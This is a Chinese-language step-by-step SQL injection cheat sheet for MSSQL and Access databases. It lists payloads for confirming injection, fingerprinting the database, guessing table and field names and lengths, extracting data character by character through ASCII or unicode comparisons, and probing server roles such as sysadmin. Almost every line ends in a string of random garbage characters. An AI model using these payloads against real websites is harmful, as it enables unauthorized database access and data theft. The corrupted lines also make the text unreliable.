1.判断是否有注入;and 1=1 ;and 1=2 }lGui>/D
2.初步判断是否是mssql ;and user>0 S1U[{R?,
pk0{*Z?@
3.注入参数是字符'and [查询条件] and ''=' ?/8V%PL~$
w^NQLV S
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ~7m+N)5
Nt/hF>"7
5.判断数据库系统 S q{@4F}d
L[!||5y
;and (select count(*) from sysobjects)>0 mssql .AZwVP<
gj
I>tz}
;and (select count(*) from msysobjects)>0 access n/S+0uT
8#/y`ul
me-uPm
m~uT8R#$
6.猜数据库 ;and (select Count(*) from [数据库名])>0 <,D*m+BWn
_tE55X&
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 8 #:k
&0xM 2J
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 "uFwsjz&B
dg_w$#
9.(1)猜字段的ascii值(access) 'c# }^@G
cZ# %tT#
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 F6aC'<#/
KtGbpcS$f
(2)猜字段的ascii值(mssql) !;0K=~(Y^
rR
8 6D
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 1xInU_SPf
cQm4q19
10.测试权限结构(mssql) K~B
c=X+uO-
mhB2l/
Xt
+9z
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ILqBa:J
?wFL\C
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 2f620
bF5"ab0
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- /aIGq/;Y+a
]sJC%/
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- bkS"]q)>
\`E^>6!]q
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- Ov^##E
~H1<